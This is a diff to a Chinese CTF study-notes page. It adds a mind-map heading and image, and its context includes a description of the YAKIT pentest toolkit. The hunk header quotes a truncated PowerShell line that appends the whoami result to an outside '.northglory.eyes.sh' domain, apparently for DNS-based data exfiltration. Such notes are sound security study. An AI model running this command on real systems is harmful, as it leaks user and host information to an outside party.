记录本体项目代码修改部分

--- a/docs/views/numerology/2025-01-14-CTFLearn.md
+++ b/docs/views/numerology/2025-01-14-CTFLearn.md
@@ -203,3 +203,8 @@ powershell $x=whoami;$x=$x.Replace('\','xxx');$y='.northglory.eyes.sh';$z=$x+$y;
 > YAKIT（Yet Another Knife for IT Security）【[官方网站](https://yaklang.com/)】是一款网络安全单兵工具，专为个人渗透测试员和安全研究人员设计。它整合了一系列实用的安全工具，例如密码破解工具、网络扫描器、漏洞利用工具等，帮助用户在一个集中化的界面下执行常见的渗透测试任务。YAKIT通常轻便且易于携带，方便在需要快速响应的应急环境中使用。
 >
 
+
+
+## 思维导图
+
+![image-20250119230234742](/img/ctfLearn/image-20250119230234742.png)
